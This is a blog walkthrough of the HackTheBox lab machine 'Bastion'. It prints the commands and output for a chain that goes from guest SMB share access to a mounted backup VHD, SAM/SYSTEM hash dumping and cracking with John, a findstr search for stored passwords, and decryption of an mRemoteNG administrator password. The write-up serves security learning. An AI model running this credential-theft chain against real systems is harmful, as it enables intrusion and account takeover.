HackTheBox Walkthrough: Bastion

Bastion was an ‘easy’-rated Windows box at Hackthebox.eu, produced by L4mpje. It was a pretty simple box, but I still learned a few things.

Hints

(highlight to reveal)

User: Guest-readable shares are never a good idea.

Root: Be sure your applications are storing passwords securely.

Initial enumeration

Bastion sits at 10.10.10.134 in the hackthebox firing range. Inital nmap scans show that the box is hosting an OpenSSH server and SMB.

root@kali:~/htb/bastion# nmap -v -Pn -n 10.10.10.134 -oG bastion.gnmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-23 14:35 EDT
Initiating SYN Stealth Scan at 14:35
Scanning 10.10.10.134 [1000 ports]
Discovered open port 139/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
Completed SYN Stealth Scan at 14:35, 1.84s elapsed (1000 total ports)
Nmap scan report for 10.10.10.134
Host is up (0.031s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds


Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.90 seconds
           Raw packets sent: 1003 (44.132KB) | Rcvd: 1000 (40.016KB)

Host is up (0.032s latency).
Not shown: 992 closed ports

Running nmap’s smb-enum-shares against the SMB server shows a few shares, including one labelled “Backups”

root@kali:~/htb/bastion# nmap -n -Pn -v 10.10.10.134 -p135,139,445  --script /usr/share/nmap/scripts/smb-enum-shares.nse

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds


Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.10.134\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: 
|     Current user access: 
|   \\10.10.10.134\Backups:
|     Type: STYPE_DISKTREE
|     Comment:
|     Anonymous access: 
|     Current user access: READ
|   \\10.10.10.134\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: 
|     Current user access: 
|   \\10.10.10.134\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: 
|_    Current user access: READ/WRITE

User

It’s easy enough to connect to that share as guest, and pull down the file ‘note.txt’

root@kali:~/htb/bastion# smbclient \\\\10.10.10.134\\Backups -u guest
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug 23 14:48:18 2019
  ..                                  D        0  Fri Aug 23 14:48:18 2019
  nmap-test-file                      A      260  Fri Aug 23 14:48:18 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

                7735807 blocks of size 4096. 2791758 blocks available

Note.txt is just an admonition to not overly tax the VPN to the remote office

Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

But it sounds like there’s a full (or at least substantial) backup on that share.

Sure enough, in Backups\WindowsImageBackup\L4mpje-PC\Backup\ 2019-02-22\ 124351\ are a couple of vhd files:

smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
  .                                   D        0  Fri Feb 22 07:45:32 2019
  ..                                  D        0  Fri Feb 22 07:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd      A 37761024  Fri Feb 22 07:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd      A 5418299392  Fri Feb 22 07:45:32 2019
  BackupSpecs.xml                     A     1186  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml      A     1078  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml      A     8930  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml      A     6542  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml      A     2894  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml      A     1488  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml      A     1484  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml      A     3844  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml      A     3988  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml      A     7110  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml      A  2374620  Fri Feb 22 07:45:32 2019

                7735807 blocks of size 4096. 2791677 blocks available

Klockw3rk has a good tutorial for using guestfstools to mount vhd files in Linux over cifs/SMB shares, which I followed with good results.

First I created acouple of mountpoints at /media/cifs and /media/htb then mounted the remote share

root@kali:~/htb/bastion# mount -t cifs //10.10.10.134/Backups /media/cifs

Then I used guestfstools to mount the larger VHD as its own drive. The smaller VHD, upon inspection, was the boot partition.

root@kali:~/htb/bastion# guestmount --add /media/cifs/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /media/htb -v

The Windows/System32/config directory was intact and accessble, with both the SAM and system files present, so I dumped those with pwdump, and scored the hash for the L4mpje user, which I was able to crack with John:

root@kali:~/htb/bastion# mkdir ~/htb/bastion/sam
root@kali:~/htb/bastion# cd ~/htb/bastion/sam
pwdump /media/htb/Windows/System32/config/SYSTEM /media/htb/Windows/System32/config/SAM >> hashes.txt
root@kali:~/htb/bastion/sam# john hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 XOP 4x2])
Remaining 1 password hash
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje     (L4mpje)
1g 0:00:00:01 DONE (2019-08-26 08:58) 0.8547g/s 8030Kp/s 8030Kc/s 8030KC/s burelison..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

Those credentials, in turn, provided shell access via SSH, and the user flag.

User flag

Root

A lot of the common tools for enumeration weren’t available.

Wmic – permission denied.

I could download accesschk.exe, but running it threw permission denied.

Tasklist – no joy.

Etc.

Findstr, however, worked just fine, and put me on the right track.

findstr /si password *.xml *.ini *.txt *.config 2>nul

That put me on to mRemoteNG’s configuration files, which stores (reversibly) encrypted passwords. In this case, the password for the Administrator account, used for RDP sessions.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml


    Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
 Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeo

While mRemoteNG encrypts the passwords it stores, it has to be able to decrypt them so it can send them to remote hosts at login time. By default, the key for the AES-encrypted strings is the md5 hash of “mR3m”. There’s also a handy tool on github for decrypting these passwords.

root@kali:~/htb/bastion# python3 ../tools/mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2

While the session stored in mRemoteNG was for RDP, it worked just fine for SSH:

Root flag

Thanks to Hackthebox for hosting, and L4mpje for putting a fun little box together and teaching me a few things.

-30-

Author: TheKilt

Information Security, Cosmic Horror, Gaming, Homebrewing, BBQ

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: